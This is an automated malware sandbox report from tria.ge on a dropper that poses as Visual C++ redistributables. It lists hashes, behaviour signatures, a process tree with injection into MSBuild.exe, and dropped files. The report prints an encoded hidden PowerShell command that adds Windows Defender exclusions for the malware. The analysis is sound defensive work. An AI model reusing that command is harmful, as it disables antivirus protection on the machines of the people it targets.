Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
15/02/2025, 19:56
Static task
static1
Behavioral task
behavioral1
Sample
95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe
Resource
win10v2004-20250211-en
General
-
Target
95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe
-
Size
3.8MB
-
MD5
3db1c66a1e51f7c1e258b1c12205a435
-
SHA1
98e24a9ea6e7c38a95543c89a037c7f3f7b1591c
-
SHA256
95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2
-
SHA512
7bec8f484f8f047d84d6f703853a56cbffa061ab22813e9449fa78382a88d9f42a27eb1f999e1e7ab30597afb49e2ff5c23f65654c4584fc75d1c2835607a407
-
SSDEEP
98304:ZsFwe8EuILKpQN0d7aePKtGBz/smtrm+2f/VSnGIm+LR4ZzK:FEoO01aFGBz/sYK+2fIGImy
Malware Config
Signatures
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x86.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4696 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 52 4044 Process not Found -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\Control Panel\International\Geo\Nation 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe -
Executes dropped EXE 3 IoCs
pid Process 4940 VC_redist.x64.exe 4520 VC_redist.x86.exe 1696 Token.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1696 set thread context of 5512 1696 Token.exe 102 -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0007000000023ded-2825.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5316 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4696 powershell.exe 4696 powershell.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 4520 VC_redist.x86.exe 1696 Token.exe 1696 Token.exe 5512 MSBuild.exe 5512 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4940 VC_redist.x64.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeDebugPrivilege 1696 Token.exe Token: SeDebugPrivilege 5512 MSBuild.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2196 wrote to memory of 4940 2196 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe 92 PID 2196 wrote to memory of 4940 2196 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe 92 PID 2196 wrote to memory of 4520 2196 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe 97 PID 2196 wrote to memory of 4520 2196 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe 97 PID 2196 wrote to memory of 4520 2196 95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe 97 PID 1696 wrote to memory of 5512 1696 Token.exe 102 PID 1696 wrote to memory of 5512 1696 Token.exe 102 PID 1696 wrote to memory of 5512 1696 Token.exe 102 PID 1696 wrote to memory of 5512 1696 Token.exe 102 PID 1696 wrote to memory of 5512 1696 Token.exe 102 PID 1696 wrote to memory of 5512 1696 Token.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe"C:\Users\Admin\AppData\Local\Temp\95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBtAFAAcAByAGUAZgBlAFIARQBOAEMAZQAgAC0AZQB4AEMAbAB1AFMAaQBvAE4AcABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBFADsAIABhAGQARAAtAG0AUABwAFIAZQBmAEUAcgBlAG4AYwBFACAALQBlAHgAQwBMAFUAUwBJAE8ATgBQAHIAbwBjAGUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACAALQBGAG8AUgBDAGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
C:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exeC:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OTI0REQyNUItOUMyMS00NkU3LUFCNEItNzJFMkUzRDBBMzI0fSIgdXNlcmlkPSJ7NTE4MjAyRkYtMDcwRC00REVGLUI5MDEtNTUxMkUwM0EwRjdDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODA3NERDQzgtNTExNi00RDZBLUExMTMtQzAwNTE5MEFEODExfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODM0MTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NTUzNjg2NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MjExNzY3MTI2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5316
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
653KB
MD54f6e118ff053bda4f358922e704e6e2d
SHA1b09ee9ecb9b16910e7d5b0b151095655eac86666
SHA256c4d8a65844301bbe75699e5de0d2a576f1fa07e0cf259810bdc68b045cb14225
SHA512a78fb7027e39f29cb768cd0f6ed11ab4e56179b04b782f0f293fe0743fc88e418da8ea9698d78ff462cb650694fc4a14003537f4decb0db6313061a1afa25b4c
-
Filesize
8.2MB
MD595a8e03433879dc9bbe059a6f8ba3f5c
SHA19b15abecbc64573f9709847e22c2006a2bfec327
SHA256c09055cde3e0d6c5ebad2cf79f3e735c3ce5f5ded864130098fe2c4165b99fa1
SHA5123d1d9c0e77085258bfb834ca5d65e6aaad3a3a3a426cda50f2a6b99ad03c65b83f25a853a3a8c900aa01fe17e0a741b73bf20364006d1a16a5c21356095c49c5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82